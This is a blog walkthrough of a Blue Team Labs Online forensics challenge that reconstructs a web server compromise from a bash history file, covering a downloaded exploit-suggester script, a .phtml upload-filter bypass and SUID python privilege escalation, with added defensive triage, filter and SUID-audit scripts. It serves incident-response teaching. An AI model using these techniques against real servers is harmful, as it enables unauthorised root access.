Blue Team Labs Online — Log Analysis — Privilege Escalation Challenge Walkthrough

Analyzing Web Server Compromise with Bash History Logs and Notepad++

Drew Arpino
8 min read · Aug 11, 2024
Logo credit: https://blueteamlabs.online

Introduction:

Welcome to another weekly walkthrough! If you’ve ever been curious about investigating a compromised web server, you’ve stumbled on the right blog. This week, we’re tackling the Log Analysis — Privilege Escalation challenge from Blue Team Labs Online.

This challenge is a digital forensics and incident response (DFIR) exercise that has us defenders investigating a compromised web server using only the bash history log file. To do the analysis, we’re leveraging the trusty Notepad++ to dissect the log file, uncover how the attacker compromised the server, how they escalated their privileges, and what tools they used to do it. Sounds like a fun time!

Now let’s grab some yarn and unravel the mystery behind this breach and learn a little bit more about web server security along the way. Let’s get started — thanks for reading along!

Challenge Link: https://blueteamlabs.online/home/challenge/log-analysis-privilege-escalation-65ffe8df12

Challenge Scenario:

A server with sensitive data was accessed by an attacker and the files were posted on an underground forum. This data was only available to a privileged user, in this case the ‘root’ account. Responders say ‘www-data’ would be the logged in user if the server was remotely accessed, and this user doesn’t have access to the data. The developer stated that the server is hosting a PHP-based website and that proper filtering is in place to prevent php file uploads to gain malicious code execution. The bash history is provided to you but the recorded commands don’t appear to be related to the attack. Can you find what actually happened?

Question 1: What user (other than ‘root’) is present on the server?

Okay, let’s kick off this investigation! We’ll start by downloading the bash history log file attached to the challenge. To begin our analysis, we’ll open the file in any plaintext editor to view the contents; for the examples in this blog, I will be using Notepad++.

Utilizing the log file, we’re going to locate the second user account on this server by looking for the presence of a home directory. In Linux, each regular user has a separate directory under /home; the root account’s home directory is /root instead.

On line 21 we’ll see a change directory (cd) to /home/daniel. Since Daniel has a home directory, we’ve discovered the second user account!

Question 2: What script did the attacker try to download to the server?

Let’s continue scrolling through the log to look for evidence of a file download.

Eventually, we stumble across line 32 where we see some activity using wget. Wget is a command-line utility used to retrieve files and content from the web — this seems promising! Let’s take a closer look at what was retrieved:

The end of the URL path is a shell script file “linux-exploit-suggester.sh” retrieved from a GitHub repository. Let’s get some background on this tool to determine if we found the correct answer. I’ll refer to the Kali Linux documentation that states that linux-exploit-suggester is:

a Linux privilege escalation auditing tool. It’s designed to assist in detecting security deficiencies for given Linux kernel/Linux-based machine.

Based on the description, this script could be useful for an attacker’s follow-on activities and confirms that we located the correct script to answer Question 2.

Question 3: What packet analyzer tool did the attacker try to use?

Continuing to scan through the log file, we’ll come across several lines (41–47) listing network discovery commands — so we’re probably in the right spot to look for the answer to Question 3. While searching for the packet analyzer the attacker used, there are two tool commands that stick out from the rest: iptables and tcpdump.

If you haven’t encountered these utilities before, they are important to know in the context of this investigation, so let’s get some quick background on both.

1. iptables: iptables is a Linux firewall application that is controlled through the command line and allows configuration of network traffic rules.

2. tcpdump: Quoting the Kali Linux documentation:

This program allows you to dump the traffic on a network. tcpdump is able to examine IPv4, ICMPv4, IPv6, ICMPv6, UDP, TCP, SNMP, AFS BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS and many other packet types.

So, based on these tool descriptions, we know that tcpdump is the packet analyzer we are looking for to answer Question 3!
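The first three questions are all answered the same way: scanning the history for a handful of command patterns (a cd into /home, a wget download, network discovery and capture tools). As an added example that is not part of the original walkthrough, the Python script below automates that first pass over a bash history file. The sample history it contains is constructed to resemble the entries described above; the download URL and the directory names other than /home/daniel are placeholders, not values from the challenge file.

```python
import os
import re
from urllib.parse import urlparse

# Constructed sample history, modelled on the entries the walkthrough describes.
# The URL host/path is a placeholder; only the script and home-directory names
# come from the write-up.
SAMPLE_HISTORY = """\
ls -la
cd /home/daniel
ls
wget https://example.invalid/placeholder-repo/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
ifconfig
netstat -tulpn
iptables -L
tcpdump -i eth0 -w capture.pcap
cd /var/www/html
""".splitlines()

# /home/<user> anywhere in a command, but not e.g. /var/home/<user>.
HOME_RE = re.compile(r"(?<![\w/])/home/([A-Za-z0-9._-]+)")
DOWNLOADERS = {"wget", "curl", "fetch", "scp"}
CAPTURE_TOOLS = {"tcpdump", "tshark", "wireshark", "dumpcap", "tcpflow"}
RECON_TOOLS = {"ifconfig", "ip", "netstat", "ss", "iptables", "arp", "route"}


def command_name(line):
    """Return the bare program name of a history line, ignoring a leading sudo."""
    parts = line.strip().split()
    if parts and parts[0] == "sudo":
        parts = parts[1:]
    return os.path.basename(parts[0]) if parts else ""


def triage(lines):
    """Summarise users, downloads, capture and recon activity in a history."""
    report = {"users": set(), "downloads": [], "capture": [], "recon": []}
    for n, line in enumerate(lines, 1):          # n = 1-based history line number
        for user in HOME_RE.findall(line):
            report["users"].add(user)
        tool = command_name(line)
        if tool in DOWNLOADERS:
            for tok in line.split()[1:]:
                if "://" in tok:                 # record the retrieved file name
                    name = urlparse(tok).path.rsplit("/", 1)[-1]
                    report["downloads"].append((n, tool, name))
        if tool in CAPTURE_TOOLS:
            report["capture"].append((n, tool))
        if tool in RECON_TOOLS:
            report["recon"].append((n, tool))
    return report


def triage_file(path):
    """Run triage() over a real .bash_history file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return triage(fh.read().splitlines())


if __name__ == "__main__":
    r = triage(SAMPLE_HISTORY)
    print("home directories seen:", sorted(r["users"]))
    print("downloads:", r["downloads"])
    print("packet capture:", r["capture"])
    print("network recon:", r["recon"])
```

Run it against a real file with triage_file("/path/to/.bash_history"). The line numbers it reports line up with the numbers used in this walkthrough only if the file has no blank lines trimmed; the point is to get a shortlist of lines worth opening in the editor, not to replace reading them.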

Question 4: What file extension did the attacker use to bypass the file upload filter implemented by the developer?

To answer Question 4, we’re going to search for the keyword “uploads” to locate relevant log entries. Let’s focus on the last line of our log, line 63.

Unfortunately, we don’t have any deeper visibility into the setup of the PHP web server and how the developer implemented the file upload filter, so we are going to have to rely on some context clues.

Analyzing this command tells us that the file x.phtml was deleted (rm) from the web server’s upload directory. This might indicate that the attacker is deleting indicators of their intrusion (MITRE ATT&CK T1070.004) following a malicious file upload.

Since there is evidence of file upload activity, the developer’s statement that “proper filtering is in place to prevent php file uploads to gain malicious code execution” might not be accurate. From the evidence, we might assume that the developer only filtered the .php file extension rather than also adding other standard PHP extensions like .php3 and .phtml.

Putting our evidence together: the developer stated that some file upload validation is in place, but we don’t know its full scope; we know a file with the .phtml extension was uploaded to the web server; and that file was later removed. I think we have enough evidence to say with some confidence that the .phtml file bypassed the upload filter.
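To make the inferred weakness concrete, here is an added example (my own code, not the challenge site’s PHP or anything from the write-up) contrasting the kind of denylist filter the evidence points to with an allowlist filter. The logic is language-independent, so it is written in Python to match the other examples on this page; the extension lists are constructed for illustration.

```python
import os

# Only image uploads are wanted; anything else is rejected by name.
IMAGE_ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif"}


def weak_filter_accepts(filename):
    """Denylist of a single extension: the filter the evidence suggests."""
    return not filename.endswith(".php")


def strict_filter_accepts(filename):
    """Allowlist: bare file name, exactly one extension, from the image set."""
    if "\x00" in filename:                       # null bytes never belong in a name
        return False
    base = os.path.basename(filename)
    if base != filename or base in ("", ".", ".."):
        return False                             # no directory components
    stem, ext = os.path.splitext(base)
    if not stem or "." in stem:
        return False                             # one extension only
    return ext.lower() in IMAGE_ALLOWLIST


def compare(filenames):
    """Map each name to (weak_accepts, strict_accepts) for side-by-side review."""
    return {f: (weak_filter_accepts(f), strict_filter_accepts(f)) for f in filenames}


if __name__ == "__main__":
    for name, (weak, strict) in compare(["photo.jpg", "x.phtml", "x.php"]).items():
        print(f"{name:12} denylist={'accept' if weak else 'reject':7} "
              f"allowlist={'accept' if strict else 'reject'}")
```

The name check is only one layer: the upload directory should also be outside the web root or have script execution disabled, so that a file that slips past the filter still cannot be run by the PHP handler.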

Question 5: Based on the commands run by the attacker before removing the php shell, what misconfiguration was exploited in the ‘python’ binary to gain root-level access? 1- Reverse Shell ; 2- File Upload ; 3- File Write ; 4- SUID ; 5- Library load

To answer the final question, we’ll focus on the Python activity that occurred before the last line we analyzed in the previous question.

We know we are looking for some exploitation of the Python binary, so let’s try to add some context about the command we see in line 62.

To do this, we need to find some reference about abusing binaries on Linux systems. Fortunately, the challenge provides a reference link to the GTFOBins repository.

So, what are GTFOBins and how can they help us solve this challenge?

GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.

The project collects legitimate functions of Unix binaries that can be abused to get the f**k break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.

This sounds promising! Let’s review the repository and search for Python.

Once we have read the various payloads available, we will stumble across a privilege escalation method using Python which is achieved with the same command that we discovered in our bash history log!

Since we have located the same commands in our log and have a documented method of SUID bit privilege escalation, we have enough information to answer Question 5 and wrap up this investigation!
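From the defender’s side, the question behind Question 5 is “which binaries on this host carry a SUID bit they should not have?” As an added example that is not part of the original walkthrough or of GTFOBins, the script below audits a directory tree for SUID files and flags those whose name is an interpreter or shell, since those are the cases GTFOBins documents as privilege escalation paths. The interpreter and expected-helper lists are constructed and deliberately incomplete; the sample entries in the test are constructed file modes, not a scan of any real system.

```python
import os
import re
import stat

# Programs that can run arbitrary code for their caller; a SUID bit on any of
# these is the misconfiguration class in Question 5. Constructed, not exhaustive.
INTERPRETER_NAMES = {"python", "perl", "ruby", "bash", "sh", "dash", "zsh",
                     "php", "node", "lua"}
# Helpers that normally carry SUID on a typical Linux install (constructed, partial).
EXPECTED_SUID = {"passwd", "sudo", "su", "mount", "umount", "chsh", "chfn",
                 "newgrp", "gpasswd"}


def canonical_name(path):
    """'/usr/bin/python3.8' -> 'python': drop a trailing version suffix."""
    return re.sub(r"[\d.]+$", "", os.path.basename(path))


def classify_suid(entries):
    """entries: iterable of (path, st_mode). Returns [(path, verdict), ...]."""
    findings = []
    for path, mode in entries:
        # Symlinks and directories are skipped; only regular files carry a usable SUID bit.
        if not stat.S_ISREG(mode) or not (mode & stat.S_ISUID):
            continue
        name = canonical_name(path)
        if name in INTERPRETER_NAMES:
            verdict = "high: SUID on interpreter/shell, remove with chmod u-s"
        elif name in EXPECTED_SUID:
            verdict = "expected: standard SUID helper"
        else:
            verdict = "review: unexpected SUID binary"
        findings.append((path, verdict))
    return findings


def scan(roots):
    """Walk the given directories and classify every SUID regular file found."""
    entries = []
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for f in files:
                p = os.path.join(dirpath, f)
                try:
                    entries.append((p, os.lstat(p).st_mode))
                except OSError:
                    continue                      # unreadable entry, skip it
    return classify_suid(entries)


if __name__ == "__main__":
    for path, verdict in scan(["/usr/bin", "/usr/local/bin"]):
        print(f"{verdict:48} {path}")
```

Running scan() over /usr/bin and /usr/local/bin on a live host gives a short list to reconcile against the package manager’s expected permissions; anything in the "high" bucket is the Question 5 scenario waiting to happen, and the fix is simply clearing the bit.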

Conclusion:

And there we have it! We’ve successfully navigated the bash history log file to discover the details of the web server compromise. With the help of Notepad++ we identified the second user account on the system, the script the attacker downloaded, the tools they used, and their method for bypassing the file upload filter. With the objectives completed, let’s close out this walkthrough of the Log Analysis — Privilege Escalation challenge!

A big thank you to Blue Team Labs Online for another fun challenge! This challenge not only highlights the importance of thorough log analysis but also demonstrates the value of understanding attacker techniques to better defend our systems. While this challenge is geared toward beginners, the hands-on practice and critical thinking required to solve it is helpful for any skill level. Personally, I was really intrigued by the exploitation of Python to achieve privilege escalation — very cool stuff!

If you found this walkthrough helpful in leveling up your skills or getting you through a tricky question, please give it a clap! Your feedback lets me know that I helped you out on your security journey. We’re in this together! Thanks for the support!

Until next week’s challenge — stay curious and be safe out there!

Tools & References:

Notepad++: https://notepad-plus-plus.org/

Kali Linux Documentation (linux-exploit-suggester): linux-exploit-suggester | Kali Linux Tools

Kali Linux Documentation (tcpdump): https://www.kali.org/tools/tcpdump/

MITRE ATT&CK (Indicator Removal: File Deletion): https://attack.mitre.org/techniques/T1070/004/

Wikipedia (PHP): https://simple.wikipedia.org/wiki/PHP

GTFO Bins: https://gtfobins.github.io/
